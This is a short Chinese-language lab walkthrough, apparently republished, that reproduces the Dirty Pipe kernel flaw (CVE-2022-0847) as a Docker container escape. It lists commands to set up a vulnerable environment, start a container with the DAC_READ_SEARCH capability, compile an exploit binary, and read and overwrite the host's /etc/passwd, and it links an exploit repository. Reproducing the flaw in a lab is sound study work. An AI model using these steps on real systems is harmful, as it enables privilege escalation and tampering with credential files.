安装环境
./metarget cnv install cve-2022-0847 --verbose
原理
同脏牛,通过写只读内存,对映射的内存做篡改
EXP
docker run --rm -it -v $(pwd):/exp --cap-add=CAP_DAC_READ_SEARCH ubuntu
如果提示 Unknown capability to add: "CAP_CAP_DAC_READ_SEARCH"错误则运行下列命令
docker run --rm -it -v $(pwd):/exp --cap-add=DAC_READ_SEARCH ubuntu
gcc dp.c -o dp
读系统文件:/exp/dp /etc/passwd
写系统文件 /exp/dp /etc/passwd 1 ootz:
GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸
参考
云原生之容器安全实践-安全客 - 安全资讯平台 (anquanke.com)文章来源:https://www.toymoban.com/news/detail-641247.html
从脏管道(CVE-2022-0847)到docker逃逸 - 先知社区 (aliyun.com)文章来源地址https://www.toymoban.com/news/detail-641247.html
到了这里,关于Docker Dirtypipe(CVE-2022-0847)漏洞复现与分析容器逃逸的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!